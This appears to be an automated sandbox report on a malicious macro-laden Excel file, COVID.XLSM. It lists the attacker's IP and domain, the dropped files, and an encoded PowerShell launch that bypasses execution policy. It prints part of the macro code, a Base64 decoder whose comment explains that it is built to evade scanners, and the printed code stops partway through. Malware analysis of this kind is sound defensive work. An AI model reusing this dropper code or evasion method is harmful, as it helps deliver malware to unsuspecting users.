                                                                                                                                            high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
206.81.23.172 | awmelisers.com | United States | 14061 | DIGITALOCEAN-ASNUS | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 471900
Start date: 26.08.2021
Start time: 07:28:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 17s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: COVID.XLSM
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.expl.evad.winXLSM@6/7@1/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 20
• Number of non-executed functions: 2
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .XLSM
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.50.102.62, 23.211.6.115, 52.109.88.177, 52.109.8.22, 52.109.76.33, 20.82.210.154, 20.54.110.249, 40.112.88.60, 20.82.209.183, 80.67.82.211, 80.67.82.235
• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, config.officeapps.live.com, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

Simulations

Behavior and APIs

Time | Type | Description
07:29:21 | API Interceptor | 38x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: 206.81.23.172
Associated Sample Name / URL | Detection | Context
COVID.XLSM | malicious |

Domains

Match: awmelisers.com
Associated Sample Name / URL | Detection | Context
cobaltocyanic.exe | malicious | 142.93.102.244

ASN

Match: DIGITALOCEAN-ASNUS
Associated Sample Name / URL | Detection | Context
COVID.XLSM | malicious | 206.81.23.172
Scan-System.exe | malicious | 157.245.3.101
Scan-System.exe | malicious | 157.245.3.101
ziprar.exe | malicious | 45.55.57.132
j777bHTnC9.doc | malicious | 138.68.30.186
j777bHTnC9.doc | malicious | 138.68.30.186
EoY_TAX_Document-73785947_20210823.xlsb | malicious | 139.59.64.195
EoY_TAX_Notificaion-9134_20210823.xlsb | malicious | 139.59.64.195
EoY_TAX_Export-6179_20210823.xlsb | malicious | 134.209.205.181
EoY_TAX_Document-3364_20210823.xlsb | malicious | 134.209.205.181
EoY_TAX_Export-15218_20210823.xlsb | malicious | 139.59.64.195
EoY_TAX_Document-8652654913_20210823.xlsb | malicious | 139.59.64.195
EoY_TAX_Export-626671470_20210823.xlsb | malicious | 139.59.64.195
EoY_TAX_Document-249607367_20210823.xlsb | malicious | 139.59.64.195
NMlnVly7uv | malicious | 164.90.252.215
VvamA82Yw7.doc | malicious | 67.205.158.47
VvamA82Yw7.doc | malicious | 67.205.158.47
tiS0LFl5Cd.exe | malicious | 167.172.146.76
n038rUglDh.exe | malicious | 142.93.237.125
VXS0UU2rgK.exe | malicious | 134.209.79.108

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BF4B57C3-D181-4204-9680-790D8457BA20
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 136730
Entropy (8bit): 5.361398094844069
Encrypted: false
SSDEEP: 1536:qcQIKNveBQA3gBwbnQ9DQW+z2Y34ZliKWXboOidXqE6LWME9:+CQ9DQW+zaX31
MD5: C2A7D3D122F512DFD2CBB9CB5CCEBB3C
SHA1: 5DE10CDD2E4A94CD89D7F73B625704FEAE8285F2
SHA-256: 3D1BA3F94CDFE34D999F2A5B7C6B194234615486A9ADAF8479A7C36758DD5D33
SHA-512: AE6EE8A2A2BED5F2F0AA529D1F82C099EB1EFD024E8C958354A2F21576E0AC7D1E1284D01F83444D354ACDD802DF0B3E14FA9125CD737C04304C9FBD5A2B1BB8
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-08-26T05:29:08">.. Build: 16.0.14416.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3357C4D0.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 858 x 377, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 33792
Entropy (8bit): 7.986190069917012
Encrypted: false
SSDEEP: 384:TYg4p/y01k5xsyD4Pc+aJAaufwGpI+/i3jPwrgk7LD8RB+x6e/au7Ji04HFoZ1mh:TYpp3zyM+J9RGpbokfD8RB+L/7j4OZ6Z
MD5: 98331EEB50A644187B6A8081251A5DC2
SHA1: 50BC9695687A7E1EBDFF8AD191F8125D9E080410
SHA-256: FA921E6572C0A6B3EC1E193CE87E07F9756EFFC0BD16FBD45C88AC1EBE75C458
SHA-512: 5276AB809A7849AD4709A0B7A288C7E8413B9F152E659D28CA65A25531DEC33EFC5589ECDF8BBEA2121314023F93C86EDA376E2D591721540171C8BB26EB6493
Malicious: false
Reputation: low
Preview: .PNG........IHDR...Z...y............pHYs..........o.d...@PLTE....................................@;5................r.........@;7.....................?8-.uB>5......................E:+.w..............................M4...........o......%%%.{.....................................................................9.,...999...,,,...$.......C*.......222........QQQ.....???....) 8..WWW...{{{..A5!.|...4,.........eee&........C/..w.....```......tk[ZQA..zHHH.~...MLLDDC.....LC4......{rc...SJ9...kkk[[[kbRuuu:2#...ppp.zjbYI....q.....k...nPO....m......V]v^e~.~...d6..cE.&.....tV*..f...x]\..X.rD.......qp..Oms.}..........Bz"...fIDATx.._..H.............7?.....W.\_.Y.D.". 2dC\_V....'....|.2vw.;.IO.\z...?I.u.../...A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..)....A..o....y...B$t..P.................?....J....zv.c......W(~.Q.E.}g...gd......e.<.>x...8...J....-[..`_....#\.,..].%.W..E...O=.HW..O.<..........;=A;......wv..ZW.^...j.7t..36~......m..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1196
Entropy (8bit): 5.333915035046385
Encrypted: false
SSDEEP: 24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9+d:qZPerB4nqRL/HvFe9t4Cv94an+d
MD5: C559CE34C3E40660BFCF532F1DB632A1
SHA1: E8DD36485347F0D309602EB3DE1EB704DFD48D00
SHA-256: CE3F8DAD9C5449DB0E8AFB39012720F64432C26D1C5F3DEA7C466A5D9FEA019A
                                                                                                                                              SHA-512:149E232B112B29A02A4443F19533822CC79D70B85E7D896AB4925247C0F79524C8EE13FFA9F465CD144BA73B8821D5697973056907494EC3935B5D910AC44C19
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_auo44y4y.l0i.ps1
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              Preview: 1
                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq1iqdxz.5cl.psm1
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              Preview: 1
                                                                                                                                              C:\Users\user\Desktop\~$COVID.XLSM
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                              Malicious:true
                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              C:\Users\user\Documents\20210826\PowerShell_transcript.675052.5LFBxafq.20210826072919.txt
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, LF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):32820
                                                                                                                                              Entropy (8bit):5.126813110627341
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:eM5exTRM5exTbM5exToM5exTlM5exTu0M5exTl:zYaYcY5Y+Y4Yp
                                                                                                                                              MD5:513EA5C4C1F66F5A5209E5D431192B05
                                                                                                                                              SHA1:8B18BDDBAAB480D8728016333BA7121F64F628F7
                                                                                                                                              SHA-256:9F6BBA2A286311BCA100387A28F1BA11B0055EB6B413FDBD04103172E11CCA8F
                                                                                                                                              SHA-512:B58D0AE91B11F107E58BBC8DE65540A717545F2F33119F1E97E2AD59217DF1010CADC908D469AF845DE84DB2F574B4C7139699ABB48F62E1ECDDBC215AD6A62E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210826072920..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 675052 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -ExecutionPolicy BypasS -ENC

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                              Entropy (8bit):7.97231654284083
                                                                                                                                              TrID:
                                                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (52504/1) 52.24%
                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 39.80%
                                                                                                                                              • ZIP compressed archive (8000/1) 7.96%
                                                                                                                                              File name:COVID.XLSM
                                                                                                                                              File size:68807
                                                                                                                                              MD5:c123363068a4651c9c0c6b4e01b35142
                                                                                                                                              SHA1:8de437d8df29c53e9ebb03a797fdbf805c10429a
                                                                                                                                              SHA256:e5e65b70b5497f146609db5c086e997a4b0ab2352b534c9e25d8a10407801d78
                                                                                                                                              SHA512:716b63a43665148721ef8a1f8f43e8cadeac054af3788d6d496df8e71cc0dae12b880e98531d8087b16033330525fb051a45e689be51276aa1de68c5ea44a6d4
                                                                                                                                              SSDEEP:1536:ojIIRVJJfdsj1kFKEOkv1DRm7PAoLl2idZ19SpV:onrJJfdkUKEV1DRm7PAoxDbSpV

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74ecd0e2f696908c

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "/opt/package/joesandbox/database/analysis/471900/sample/COVID.XLSM"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:False
                                                                                                                                              Application Name:unknown
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:
                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:True

                                                                                                                                              Summary

                                                                                                                                              Subject:Removed Hoo36:HA/HB/HQ and corresponding crosswalk and 2nd modifer codes per CABHA policy and IU82.
                                                                                                                                              Author:twildfir
                                                                                                                                              Last Saved By:Administrator
                                                                                                                                              Create Time:2001-04-16T18:40:12Z
                                                                                                                                              Last Saved Time:2021-08-05T13:08:31Z
                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                              Security:0

                                                                                                                                              Document Summary

                                                                                                                                              Thumbnail Scaling Desired:false
                                                                                                                                              Company:Thomas S Services
                                                                                                                                              Contains Dirty Links:false
                                                                                                                                              Shared Document:false
                                                                                                                                              Changed Hyperlinks:false
                                                                                                                                              Application Version:16.0300

                                                                                                                                              Streams with VBA

                                                                                                                                              VBA File Name: Alt Svc Array.cls, Stream Size: 177
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/Alt Svc Array
                                                                                                                                              VBA File Name:Alt Svc Array.cls
                                                                                                                                              Stream Size:177

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              False
                                                                                                                                              VB_Exposed
                                                                                                                                              Attribute
                                                                                                                                              VB_Name
                                                                                                                                              VB_Creatable
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              VB_Base
                                                                                                                                              VB_Customizable
                                                                                                                                              Array"
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "Alt Svc Array"
                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                              VBA File Name: Archived Alt Svcs.cls, Stream Size: 179
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/Archived Alt Svcs
                                                                                                                                              VBA File Name:Archived Alt Svcs.cls
                                                                                                                                              Stream Size:179

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              False
                                                                                                                                              VB_Exposed
                                                                                                                                              Attribute
                                                                                                                                              Svcs"
                                                                                                                                              VB_Name
                                                                                                                                              VB_Creatable
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              VB_Base
                                                                                                                                              VB_Customizable
                                                                                                                                              "Archived
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "Archived Alt Svcs"
                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
VBA File Name: Service Array.cls, Stream Size: 178

General
Stream Path: VBA/Service Array
VBA File Name: Service Array.cls
Stream Size: 178
Data ASCII: . . . . A t t r i b u t . e V B _ N a m . e = " S e r . v i c e A r r a y " . . . . B a . s . . 0 { 0 0 0 2 ` 0 8 2 0 - . . . . C # . . . . 4 6 } . | G l . o b a l . . S p a . . . = F a l s e . . % C r e a t a b . l . . P r e d e c $ l a . . I d . # T r . u . " E x p o s e . . . . @ T e m p l a . t e D e r i v . . . C u s t o m i z . . D . 2
Data Raw: 01 ae b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 53 65 72 00 76 69 63 65 20 41 72 72 20 61 79 22 0d 0a 0a 90 42 61 02 73 02 90 30 7b 30 30 30 32 60 30 38 32 30 2d 00 10 04 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d2 53 70 61 01 00 c6 3d 20 46 61 6c 73 65 01 0c 25 43 72 65 61 74 61 62 02 6c 15 1f 50 72 65 64 65 63 24 6c 61 00 06 49

VBA Code Keywords

Keyword
False
"Service
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
Array"
VB_TemplateDerived

VBA Code
Attribute VB_Name = "Service Array"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Sheet3.cls, Stream Size: 171

General
Stream Path: VBA/Sheet3
VBA File Name: Sheet3.cls
Stream Size: 171
Data ASCII: . . . . A t t r i b u t . e V B _ N a m . e = " C O V . I D - 1 9 " . . . . . B a s . | 0 { 0 . 0 0 2 0 8 2 0 - . . . . C . . . . 4 6 } . . | G l o b a l . . . S p a c . . F a l . s e . % C r e a t . a b l . . P r e d . e c l a . . I d . # . T r u . " E x p o . s e . . . @ T e m p . l a t e D e r i . v . % C u s t o m . i z . D . 2
Data Raw: 01 a7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 43 4f 56 00 49 44 2d 31 39 22 0d 0a 11 0a f8 42 61 73 02 7c 30 7b 30 00 30 30 32 30 38 32 30 2d 1b 00 20 04 08 43 05 12 03 00 34 36 7d 81 0d 7c 47 6c 6f 62 61 6c 01 c8 10 53 70 61 63 01 92 46 61 6c 04 73 65 0c 25 43 72 65 61 74 08 61 62 6c 15 1f 50 72 65 64 90 65 63 6c 61 00 06 49 64 00 23 08 54 72 75

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code
Attribute VB_Name = "COVID-19"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: ThisWorkbook.cls, Stream Size: 21290

General
Stream Path: VBA/ThisWorkbook
VBA File Name: ThisWorkbook.cls
Stream Size: 21290
Data ASCII: . ( . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D 1 . 2 . . P . . . . C . o n s t c l O @ n e M a s k . . 1 . 6 5 1 5 0 7 2 D . . T w o . . 2 ` 5 8 0 4 8 . . . . h . r e . & 4 0 3 . $ . . . F o u r . . 6
Data Raw: 01 28 b6 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

VBA Code Keywords

Keyword
Err.Raise(vbObjectError,
objProcess
HFJWES()
Byte,
vbNullString)
Byte)
KXHYIJHM
UUWMBBYKB
XUN_Status_IIWSY
vbUnicode)
Long,
string
YPMONNH()
COATGA()
Left$(sOut,
fileStr
HGOJT
KEXMPA
JRXIGRYYS()
Select
AZZOPCRZ
Null,
SJCJKCEIK
LIOHCE
"==")
SMKCP()
Chr(IFDHRCKM)
BypasS
TLVGOS
YPMONNH
ElseIf
DNNNEG()
GNNYSJH()
VB_Exposed
vbCr,
Integer,
JEMZL
objStartup
ZCJRIAGUQ
NEQOX
ALUJKC()
sngEnd
objConfig,
objConfig
VB_GlobalNameSpace
GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM,
UBound(bIn)
KUROX
VB_Customizable
"Input
LIOHCE()
While
clFourMask
Const
YJIEAROTM
"ThisWorkbook"
Pause
XIPVTCZDC
False
CGZLOG
QVLNNDSKO()
Workbook_Open()
String,
String)
JRXIGRYYS
ROUSOTA
DNSXAYNXP()
clHighMask
StrConv(sString,
bOut((((UBound(bIn)
NJMJWPKXQ
BVPGJO
JHHCFDZ()
VerifyPath
UUWMBBYKB()
lTemp
SMKCP
VB_Creatable
clThreeMask
GYFM(FUUF
intProcessID
-ExecutionPolicy
KFUTZNLZL()
NEQOX()
GNNYSJH
VB_Name
CCLMWCIDS()
NSMUCQAR
ILLKSP()
vbLf,
FLUZTZ()
bTrans(lTemp)
"cmd.exe
clLowMask
Single
MZAYGW
ZDOHNZM
Public
ReDim
bIn()
BAWYHCKJY()
JFXGQIB
YJIEAROTM()
RPNIKTOKD
BAWYHCKJY
Replace(sString,
XUN_Status_IIWSY()
sngSecs
VB_Base
JPRWYVV
ALUJKC
OTRB(RPNIKTOKD
KEXMPA()
JEMZL()
NJMJWPKXQ()
HGOJT()
JHHCFDZ
Len(sOut)
                                                                                                                                              MZAYGW()
                                                                                                                                              AQMDIAVR
                                                                                                                                              OOTTQRB()
                                                                                                                                              "MyDecode",
                                                                                                                                              IFDHRCKM
                                                                                                                                              objProcess.Create
                                                                                                                                              sString
                                                                                                                                              OOTTQRB
                                                                                                                                              TLVGOS()
                                                                                                                                              bTrans(bIn(lChar
                                                                                                                                              clMidMask
                                                                                                                                              NSMUCQAR()
                                                                                                                                              AZZOPCRZ()
                                                                                                                                              ""powershell
                                                                                                                                              BVPGJO()
                                                                                                                                              COATGA
                                                                                                                                              Single)
                                                                                                                                              CovidMap()
                                                                                                                                              InStrRev(sString,
                                                                                                                                              bOut(lPos)
                                                                                                                                              DoEvents
                                                                                                                                              clOneMask
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              KNNPPF()
                                                                                                                                              XIPVTCZDC()
                                                                                                                                              KXHYIJHM()
                                                                                                                                              bOut(lPos
                                                                                                                                              VerifyPath()
                                                                                                                                              clTwoMask
                                                                                                                                              JPRWYVV()
                                                                                                                                              strstr
                                                                                                                                              SJCJKCEIK()
                                                                                                                                              DNSXAYNXP
                                                                                                                                              StrConv(bOut,
                                                                                                                                              iPad)
                                                                                                                                              String
                                                                                                                                              ILLKSP
                                                                                                                                              QVLNNDSKO
                                                                                                                                              Timer
                                                                                                                                              KFUTZNLZL
                                                                                                                                              Len(sString)
                                                                                                                                              ROUSOTA()
                                                                                                                                              CGZLOG()
                                                                                                                                              objStartup.SpawnInstance_
                                                                                                                                              IZDFYVTMF
                                                                                                                                              HFJWES
                                                                                                                                              ZCJRIAGUQ()
                                                                                                                                              NEUWH
                                                                                                                                              objWMIService
                                                                                                                                              Attribute
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              JFXGQIB()
                                                                                                                                              KUROX()
                                                                                                                                              strstr,
                                                                                                                                              FLUZTZ
                                                                                                                                              DNNNEG
                                                                                                                                              Function
                                                                                                                                              valid
                                                                                                                                              vbFromUnicode)
                                                                                                                                              lChar
                                                                                                                                              bOut()
                                                                                                                                              KNNPPF
                                                                                                                                              GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM,
                                                                                                                                              Pause(sngSecs
                                                                                                                                              lQuad
                                                                                                                                              AQMDIAVR()
                                                                                                                                              Private
                                                                                                                                              objConfig.ShowWindow
                                                                                                                                              IZDFYVTMF()
                                                                                                                                              VBA Code
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


' Bit masks and powers of two used by the hand-rolled Base64 decoder (Decode64) below
Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255
Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

' Standard Base64 decoder implemented in VBA so the payload string can be
' decoded without calling any library routine that a scanner might flag
Public Function Decode64(sString As String) As String
	Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
	Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
	Dim lTemp As Long
	sString = Replace(sString, vbCr, vbNullString)
	sString = Replace(sString, vbLf, vbNullString)
	lTemp = Len(sString) Mod 4
	If lTemp Then
		Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
	End If
	If InStrRev(sString, "==") Then
		iPad = 2
	ElseIf InStrRev(sString, "=") Then
		iPad = 1
	End If
	' Build the reverse lookup table for the Base64 alphabet (A-Z, a-z, 0-9, +, /)
	For lTemp = 0 To 255
		Select Case lTemp
			Case 65 To 90
				bTrans(lTemp) = lTemp - 65
			Case 97 To 122
				bTrans(lTemp) = lTemp - 71
			Case 48 To 57
				bTrans(lTemp) = lTemp + 4
			Case 43
				bTrans(lTemp) = 62
			Case 47
				bTrans(lTemp) = 63
		End Select
	Next lTemp
	For lTemp = 0 To 63
		lPowers6(lTemp) = lTemp * cl2Exp6
		lPowers12(lTemp) = lTemp * cl2Exp12
		lPowers18(lTemp) = lTemp * cl2Exp18
	Next lTemp
	bIn = StrConv(sString, vbFromUnicode)
